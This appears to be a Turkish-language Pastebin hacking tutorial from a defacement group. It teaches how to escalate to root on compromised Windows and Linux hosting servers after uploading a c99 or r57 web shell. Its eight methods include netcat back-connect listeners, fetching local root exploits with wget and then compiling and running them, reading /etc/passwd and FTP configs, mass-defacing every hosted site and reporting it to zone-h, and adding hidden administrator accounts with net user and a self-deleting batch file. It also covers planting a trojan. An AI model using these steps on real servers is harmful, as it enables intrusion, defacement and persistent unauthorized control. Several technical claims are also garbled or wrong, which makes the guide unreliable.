Advertisement
KingSkrupellos

Win Linux OS Sunucuda Sh3LL ile Rooting Olma Detaylı Anlatım

Sep 16th, 2017
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.67 KB | None | 0 0
  1. Selamün Aleyküm Cyberizmciler ben KingSkrupellos Cyberizm.Org. Bugün size server rootlamaya elimden geldiğince anlatmaya çalıştım. Konuya uygun videolarda buldum. Bu konuyu forumda
  2. sevdiğim bir kardeşimin hatırına yaptım. Sizlerde faydalanın istedim.
  3. (Administrar/root) en servidores Windows (C99 Shell)
  4. [video=youtube]http://www.youtube.com/watch?v=LfX5n0a0RIk[/video]
  5. Windows Back Connect
  6. [video=youtube]http://www.youtube.com/watch?v=7gQ6cyqT_1k[/video]
  7. Linux Server Root
  8. [video=youtube]http://www.youtube.com/watch?v=aN6PklINTTU[/video]
  9. SQL injection+SHELL upload+Rooting a server
  10. [video=youtube]http://www.youtube.com/watch?v=dOpPbpUeeAo[/video]
  11. Serverda Shell ile root olmak için size lazım olan hack yemek malzemeleri => netcat programı, c99 veya r57 shell, zone-h sitesi mass deface kaydı perl, mass.pl, ve bir tanede index
  12. 1. YÖNTEM => Binshell ile açık bir porta bağlan. ondan sonra /tmp dizini her zaman permissonu 777 olan alandır, hostun üst dizinlerini görüntüleye biliyorsan /tmp dizinine girerek bindshelli buraya upload et.Eğer /tmp dizinini görme yetkin yoksa bindshelli ayrı bir servera atarız wget komutuyla shell bulunan serverın dizinine çek. /tmp te bindshellin duruyor ise (server türüne göre bindshellimiz) şimdi yapacağın iş c99 shell için tools bölümüne gelip bindshell yazan yerde bindshellimizin kullanıcı adı şifre ve portunu yazarak bağlanmaktır.Daha sonra tablodan halletcin işi.
  13. 2. YÖNTEM => NetCat programı ile ( hem sende kurulu hem karşı pc'de yada serverda kurulu olması gerekiyor - yada bir başka deyişle yüklenmesi gerekiyor )Daha sonra bir tablo çıkacak ondan sonrasını yine basitleşiyor.Bir diğer husus ise şöyle anlatıyım => Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz. karşımıza siyah ms-dos ekranı gelecek bu ekrana nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz)shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandıkmı bakalım.Servera bağladıysanız hangi yıl olduğu ve sürümü çıkacaktır.Mesela bu yıl 2014 sürümü 2.7 olsun mesela. C+ exploitlerin dilidir.wget komutuyla exploiti server upload edelim ornek olarakwget http://xxx.com/2.7.c Bazen ise shelli manuel upload etmek zorunda kalabilirsiniz.attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)chmod ayarı yapacagızchmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra./root diyerek exploitimizi çağırıyoruz ID komutuyla kontrol edin.Evet serverımız rootlandı ise bu aşamadan sonra WhoAmI komutuyla görebiliriz.şimdi musait bi yere indeximizi ve mass.pl yi atalım.serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
  14. bu komutlar :
  15. [code]/etc/vdomainaliases/
  16. /etc/vfilters/
  17. /var/www/vhosts/
  18. /var/named/
  19. /etc/passwd/
  20. /etc/hosts/
  21. /etc/apache/
  22. /etc/apache2/
  23. /etc/named.conf/
  24. Mesela benimki böyle oldu => /var/www/vhosts/ cd /var/www/hosts/ [/code]
  25. komutunu verdikten sonra
  26. ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz
  27. siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
  28. kayıt ettikten sonra dos ekranında mass deface işlemine gecelim
  29. önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
  30. mass deface biraz zaman alabilir sabırlı olmak gerek
  31. işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
  32. [code]cd..
  33. cd..
  34. cd perl
  35. cd bin[/code]
  36. perl zoneh.pl hack.txt KingSkrupellos Cyberizm.Org diye (nickimi yazdım) yazıp enter diyoruz. Siz kendinize göre yapın işte.
  37. 3. YÖNTEM => Dosya upload yapmanı engelleyen temp dizinindeki bir dosyayı etkisiz hale getirmen gerekiyor.c99 shell proc. buluo birçok dosyayı silmemiz gerekiyor ki
  38. işimiz kolaylaşsın ve sistem çöksün herkese root yetkisi versin.
  39. 4. YÖNTEM => Server security information:
  40. Open base dir: /home/siteismi/:/usr/lib/php:/usr/local/lib/php:/tm
  41. gibi bir yazı bulman gerekiyor. Burada sadece sana lazım olan etc/passwd'ler bunlar ya bas, eğer basamassan webroot shell yükle onunla çek etc/passwd'leri.
  42. şöyle yazılar çıkacak mesela
  43. [code]root:x:0:0:root:/root:/bin/bash
  44. bin:x:1:1:bin:/bin:/sbin/nologin
  45. Gibi bilgiler verecek şimdi root dizini şu şekil
  46. root:x:0:0:root:/root:/bin/bash olduğu için yukarıya from:0 to: 0
  47. yazarak giriş yapıcaz gerisi sizin işinize kalıyor ..
  48. 5. YÖNTEM => Ayrıyetten birde ftp rootlama yöntemi var. Pro ftp kulanan bir hosting ise bu yolları görüntüleyerek (dikat ediniz conf ) şifreleri değiştirip root olabilirsiniz elde edeceğiniz ana< ftp sizi root yapar hosting içerisinde /home klasörü bütün sitelerin olduğu dizindir
  49. [code]proftpd.conf - /etc/proftpd.conf.tmpeditlib
  50. /etc/proftpd.conf.bytes
  51. /etc/proftpd.conf.rpmnew
  52. /etc/proftpd.conf.rpmsave
  53. /etc/proftpd.conf-
  54. /etc/proftpd.conf,v
  55. /etc/proftpd.conf
  56. /scripts/proftpd.conf.default.bsd
  57. /scripts/proftpd.conf.default[/code]
  58. 6. YÖNTEM => Diğer kısa bir anlatım - Linux server rootlamak için =>
  59. wget http://www.siteadi.com/exploits/exploitadi
  60. chmod 777 exploitadi
  61. ./exploitadi
  62. Şeklinde kullanıp serverı rootlayabilirsiniz.
  63. 7. YÖNTEM => bir win servera fso destekLi bir scriptLe girdigimiz zaman cmd iLe
  64. uzaktan komut iLe user ekleyip ;
  65. [code]net user pow3rz 123456 /add[/code]
  66. şekLinde sonra net user localgroup administrator pow3rz /add
  67. şekLinde admin yetkisi verip server ip aLıp uzak masaüstü iLe bağLanıp istedigimizi yaparız bu bir yöntem ;
  68. Eğer ki user ekeleyemezseniz
  69. [code]net user administrator /random[/code]
  70. komutuyla mevcut kullanicilarin şifrelerini öğrenebilirsiniz ;
  71. ama şöyLe düşüneLİm bir Nt servera girdik ve komut girme yetkimiz yok.
  72. neLer yapabiLiriz şimdi uzaktan komut verip user ekLeyemiyoruz ama komut çaLıştırabiLiyoruz.
  73. o zaman hemen size bir puf noktası veriyorum. yazdığımız bir kodu .bat formatına çevirip uzaktan user ekliyecez
  74. hemen başlıyalım bir txt açın ;
  75. içine
  76. [code]@echo
  77. net user cyberizm 123456 /add[/code]
  78. yazın ve cyberizm.bat die kayıt edin çaLıştırın ve denetim masasından kullanıcı hesapLarına baktığınız zaman
  79. cyberizm adında bir user oLuşturmuş olacak,
  80. şimdi hemen bir txt açıyoruz içine
  81. [code]@echo
  82. net user cyberizm 123456 /add
  83. del cyberizm.bat[/code]
  84. yazıyoruz ve cyberizm.bat die kaydediyoruz ve çalıştırıyoruz
  85. ve komuttan sonra cyberizm.bat siLinecegini göreceksiniz ve bu sayede fso içinde komut ekLetip
  86. useri kLetip aynı şekiLde administrator yetkisi vererek dosyaLarı siLdirip root düzeyine erişebiLİrsiniz.
  87. başka bir yöntem ; trojen iLe buda basit bir oLaydır arkadaşLar bir key buLnu kendi serverınızı oLuşturun.
  88. ve win servera upload edin :] serverda dosyayı çaLıştırın ve trojan buLuşacaktır. gidin proğramın cLientini
  89. açın ipden bağLanın ve client sayesinde proğram sayesinde pc ye bağLanın.
  90. 8. YÖNTEM => 2.6.30 dan 2.6.36-rc8 olan kernellerde
  91. backconnect çektikten sonra şu komutla
  92. [code]echo “alias net-pf-21 off” > /etc/modprobe.d/disable-rds[/code]
  93. yazdıktan sonra root olabilirsiniz.
  94. Not : Her server da çalışmaz.
  95. Not 2 => Yöntemler daha fazla geliştirelebilir. Beyninizi kullanın. Yöntemleri kendinize göre farklılaştırabilirsiniz.
  96. Anlatım bu kadar yeter. Umarım faydalı olmuştur.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement